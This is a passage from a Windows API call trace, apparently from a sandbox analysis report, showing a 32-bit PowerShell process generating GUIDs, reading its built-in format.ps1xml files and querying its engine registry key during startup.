pguid=0x25e358*(Data1=0xd1caddeb, Data2=0x679e, Data3=0x4c64, Data4=([0]=0x93, [1]=0xfe, [2]=0xb6, [3]=0x1b, [4]=0xeb, [5]=0x3d, [6]=0x31, [7]=0xc3))) returned 0x0 [0141.056] VirtualQuery (in: lpAddress=0x25d1e4, lpBuffer=0x25e1e4, dwLength=0x1c | out: lpBuffer=0x25e1e4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.056] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xfc179d8f, Data2=0xc5cf, Data3=0x477c, Data4=([0]=0x80, [1]=0x7e, [2]=0xb4, [3]=0x99, [4]=0xc0, [5]=0xe1, [6]=0x58, [7]=0x77))) returned 0x0 [0141.056] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe5d6d3d6, Data2=0x8944, Data3=0x405f, Data4=([0]=0xb7, [1]=0x54, [2]=0xbc, [3]=0x80, [4]=0x48, [5]=0xae, [6]=0x4c, [7]=0xd5))) returned 0x0 [0141.056] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8488eeca, Data2=0xb028, Data3=0x4e1b, Data4=([0]=0x8f, [1]=0x7d, [2]=0xb6, [3]=0xfa, [4]=0xd7, [5]=0x9e, [6]=0xe7, [7]=0xaa))) returned 0x0 [0141.056] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x9e3f1d2d, Data2=0x8ec2, Data3=0x4a52, Data4=([0]=0x89, [1]=0x75, [2]=0x54, [3]=0xbe, [4]=0xf, [5]=0xb1, [6]=0xe, [7]=0x98))) returned 0x0 [0141.056] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xc272e955, Data2=0x69ad, Data3=0x40bf, Data4=([0]=0x87, [1]=0x71, [2]=0xdd, [3]=0x15, [4]=0x32, [5]=0xd9, [6]=0x18, [7]=0xf))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x6a7c15d3, Data2=0x7591, Data3=0x4798, Data4=([0]=0xa5, [1]=0xeb, [2]=0x5c, [3]=0x83, [4]=0x3e, [5]=0x57, [6]=0x8d, [7]=0x67))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x17cc78d6, Data2=0xeb41, Data3=0x4ce5, Data4=([0]=0x9a, [1]=0x1, [2]=0xf6, [3]=0x88, [4]=0x53, [5]=0xad, [6]=0x1, [7]=0xd))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xb7c12d5c, Data2=0xe84, Data3=0x4c4e, Data4=([0]=0xaf, [1]=0xe2, [2]=0xdc, [3]=0x95, [4]=0xf9, [5]=0x62, [6]=0xe1, [7]=0x46))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x9f3b445e, Data2=0x63f3, Data3=0x4568, Data4=([0]=0xab, [1]=0x92, [2]=0x90, [3]=0xc0, [4]=0x35, [5]=0xce, [6]=0x3d, [7]=0xea))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x36b73eab, Data2=0xd303, Data3=0x42fe, Data4=([0]=0x9e, [1]=0x37, [2]=0xdd, [3]=0x30, [4]=0xf1, [5]=0x83, [6]=0xaf, [7]=0xd))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xef155668, Data2=0x8f76, Data3=0x415e, Data4=([0]=0x94, [1]=0xd2, [2]=0x64, [3]=0xcb, [4]=0x82, [5]=0xf4, [6]=0xeb, [7]=0x21))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x6141e011, Data2=0xa184, Data3=0x482b, Data4=([0]=0x8f, [1]=0x5f, [2]=0x1d, [3]=0x41, [4]=0x6d, [5]=0xf7, [6]=0x4d, [7]=0x3b))) returned 0x0 [0141.057] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x507b3e6b, Data2=0x4dbb, Data3=0x4f8b, Data4=([0]=0x8b, [1]=0x5f, [2]=0x4c, [3]=0x5f, [4]=0xcb, [5]=0xa2, [6]=0xfe, [7]=0x38))) returned 0x0 [0141.058] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x921d1ac1, Data2=0xf233, Data3=0x40d4, Data4=([0]=0xb8, [1]=0x3c, [2]=0x99, [3]=0xbe, [4]=0xa1, [5]=0x49, [6]=0x50, [7]=0x5f))) returned 0x0 [0141.058] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x62342d69, Data2=0xf78c, Data3=0x44f9, Data4=([0]=0xae, [1]=0xfe, [2]=0x8a, [3]=0xd2, [4]=0xed, [5]=0xb8, [6]=0x57, [7]=0x36))) returned 0x0 [0141.058] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x2b5a0a7d, Data2=0xc772, Data3=0x41b0, Data4=([0]=0xb6, [1]=0xc2, [2]=0x4d, [3]=0x30, [4]=0xbd, [5]=0x7b, [6]=0x74, [7]=0x59))) returned 0x0 [0141.058] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xb0b7c361, Data2=0xfdbc, Data3=0x4c63, Data4=([0]=0x8b, [1]=0xe6, [2]=0x89, [3]=0x3d, [4]=0x24, [5]=0x65, [6]=0x5e, [7]=0x6b))) returned 0x0 [0141.058] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xf3bbe019, Data2=0xb84c, Data3=0x4ad5, Data4=([0]=0x9d, [1]=0x98, [2]=0xd9, [3]=0x52, [4]=0x18, [5]=0x1b, [6]=0x87, [7]=0x2f))) returned 0x0 [0141.059] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x9a7d176c, Data2=0x2dd0, Data3=0x49c7, Data4=([0]=0xad, [1]=0x2d, [2]=0x51, [3]=0x60, [4]=0x89, [5]=0x23, [6]=0xcc, [7]=0xdc))) returned 0x0 [0141.059] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.059] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.061] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.063] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x98851f7, Data2=0x8b2, Data3=0x444d, Data4=([0]=0xa6, [1]=0x69, [2]=0xee, [3]=0x36, [4]=0x9d, [5]=0x31, [6]=0xb7, [7]=0x6))) returned 0x0 [0141.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0141.063] GetLastError () returned 0x0 [0141.063] SetErrorMode (uMode=0x1) returned 0x1 [0141.063] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.063] GetLastError () returned 0x0 [0141.063] GetFileType (hFile=0x328) returned 0x1 [0141.063] SetErrorMode (uMode=0x1) returned 0x1 [0141.063] GetFileType (hFile=0x328) returned 0x1 [0141.063] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.126] GetLastError () returned 0x0 [0141.126] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.126] GetLastError () returned 0x0 [0141.127] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.127] GetLastError () returned 0x0 [0141.127] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.127] GetLastError () returned 0x0 [0141.128] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x119, lpOverlapped=0x0) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] ReadFile (in: hFile=0x328, lpBuffer=0x2fc6ad4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x2fc6ad4*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] CloseHandle (hObject=0x328) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0141.128] GetLastError () returned 0x0 [0141.128] SetErrorMode (uMode=0x1) returned 0x1 [0141.128] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fe7ad0 | out: lpFileInformation=0x2fe7ad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0141.128] GetLastError () returned 0x0 [0141.128] SetErrorMode (uMode=0x1) returned 0x1 [0141.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0141.128] GetLastError () returned 0x0 [0141.129] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.129] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.129] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.129] RegCloseKey (hKey=0x328) returned 0x0 [0141.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0141.129] GetLastError () returned 0x0 [0141.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0141.129] GetLastError () returned 0x0 [0141.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.130] GetLastError () returned 0x0 [0141.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.130] GetLastError () returned 0x0 [0141.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.130] GetLastError () returned 0x0 [0141.130] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.130] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x4ae09e9d, Data2=0xbde1, Data3=0x4f06, Data4=([0]=0xa1, [1]=0xfc, [2]=0xab, [3]=0x1f, [4]=0xfe, [5]=0xe5, [6]=0x99, [7]=0x9e))) returned 0x0 [0141.131] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.131] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xfedb6ab8, Data2=0x6ef4, Data3=0x485d, Data4=([0]=0xb5, [1]=0x92, [2]=0xd2, [3]=0x87, [4]=0xb3, [5]=0x93, [6]=0x8e, [7]=0xa4))) returned 0x0 [0141.131] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x980f7fd4, Data2=0x93c2, Data3=0x46ef, Data4=([0]=0x91, [1]=0x71, [2]=0xbc, [3]=0xbf, [4]=0xbd, [5]=0x70, [6]=0x5d, [7]=0xe6))) returned 0x0 [0141.131] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x9b8cca04, Data2=0x3566, Data3=0x45e7, Data4=([0]=0x8c, [1]=0x31, [2]=0x17, [3]=0x6f, [4]=0x5a, [5]=0x95, [6]=0x27, [7]=0x23))) returned 0x0 [0141.131] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.131] VirtualQuery (in: lpAddress=0x25d090, lpBuffer=0x25e090, dwLength=0x1c | out: lpBuffer=0x25e090*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25ddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0141.131] GetLastError () returned 0x0 [0141.131] SetErrorMode (uMode=0x1) returned 0x1 [0141.131] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.132] GetLastError () returned 0x0 [0141.132] GetFileType (hFile=0x328) returned 0x1 [0141.132] SetErrorMode (uMode=0x1) returned 0x1 [0141.132] GetFileType (hFile=0x328) returned 0x1 [0141.132] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.189] GetLastError () returned 0x0 [0141.189] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.189] GetLastError () returned 0x0 [0141.189] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.190] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.190] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.190] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.190] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.190] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.190] GetLastError () returned 0x0 [0141.191] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.191] GetLastError () returned 0x0 [0141.191] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.191] GetLastError () returned 0x0 [0141.192] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.192] GetLastError () returned 0x0 [0141.192] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.192] GetLastError () returned 0x0 [0141.192] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.192] GetLastError () returned 0x0 [0141.192] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.192] GetLastError () returned 0x0 [0141.192] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.192] GetLastError () returned 0x0 [0141.193] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.193] GetLastError () returned 0x0 [0141.195] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.195] GetLastError () returned 0x0 [0141.195] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.195] GetLastError () returned 0x0 [0141.195] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.195] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.196] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.196] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.196] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.196] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.196] GetLastError () returned 0x0 [0141.196] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.197] GetLastError () returned 0x0 [0141.197] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.198] 